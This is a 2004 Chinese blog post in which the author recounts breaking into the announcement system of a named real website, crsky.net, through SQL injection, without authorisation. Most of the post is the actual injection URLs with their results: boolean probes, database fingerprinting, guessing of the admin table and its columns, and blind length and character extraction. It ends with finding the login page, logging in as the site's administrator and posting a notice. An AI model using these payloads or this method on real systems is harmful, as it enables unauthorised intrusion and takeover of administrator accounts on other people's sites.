[原创]成功注入霏凡主站公告系统

作为国内破解软件网站的代表,霏凡(http://www.crsky.net)由于安全的问题,论坛已经关闭了一段时间了。今天无意去霏凡主站,哈哈,,公告系统居然又sql注入漏洞,,于是就又了下面一篇文章。。。



开始用


http://www.crsky.net/zhnew/show.asp?id=26 and 1=1 试了一下
发现没报错。哈哈。有希望。。


http://www.crsky.net/zhnew/show.asp?id=26 and 1=2
出错了,看来存在sql注入漏洞。。


首先要判断数据库类型


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(*) from sysobjects)>;0
出错了。。


估计就是 Access了


接下来猜表名。。


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(*) from admin)>;=0
哈哈。。返回正常。。。。一下子就拿到了一个表名。。


然后就要猜用户名的字段了。


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(user) from admin)>;=0
错了,看来没有user这个字段。


在试 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(username) from admin)>;=0
晕,还是不对。。


。。。。。。。。


终于 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(name) from admin)>;=0
返回正常了。。。我们又得到了一个用户名字段name


在往后就要猜密码的字段了。


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(password) from admin)>;=0
错了,,,接着猜。。


。。。。。。。。。。。。。


终于 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(pwd) from admin)>;=0
哈哈, 正常了。。。

我们又得到了一个密码的字段pwd


晕。。真累。。喝口水先。



要猜用户名了。。


先猜用户名的长度。


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(name) from admin)>;2 返回正常
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(name) from admin)>;4 出错
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(name) from admin)>;3 正常


得出,用户名长度为4。 先不管他密码加密没加密。。拿到用户名再说


猜用户名第一位。。

http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name, 1, 1)) from admin)>;0 出错了
http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name, 1, 1)) from admin)<;128 返回正常
http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name, 1, 1)) from admin)>;1 出错了!!!


看来asc码为负数,是中文。。。
。。。。。。。。。


猜得用户名: 逃学小龙


猜密码。。



先猜密码的长度。


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>;2 返回正常
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>;4 出错
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>;3 正常


密码的长度也为4。哈哈。。。会不会和用户名一样呢。。。


不管,还不知道管理员入口呢。。。


猜猜看。。
http://www.crsky.net/zhnew/index.asp 不对
。。。。。。


http://www.crsky.net/zhnew/login.asp 找到了。。


把用户名和密码都用逃学小龙试试。。。


成功了!!!!!!



发了个公告。提醒站长一下。。见 http://www.crsky.net/zhnew/show.asp?id=31


累了。。睡觉去。。。

                                                                 2004 .8

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值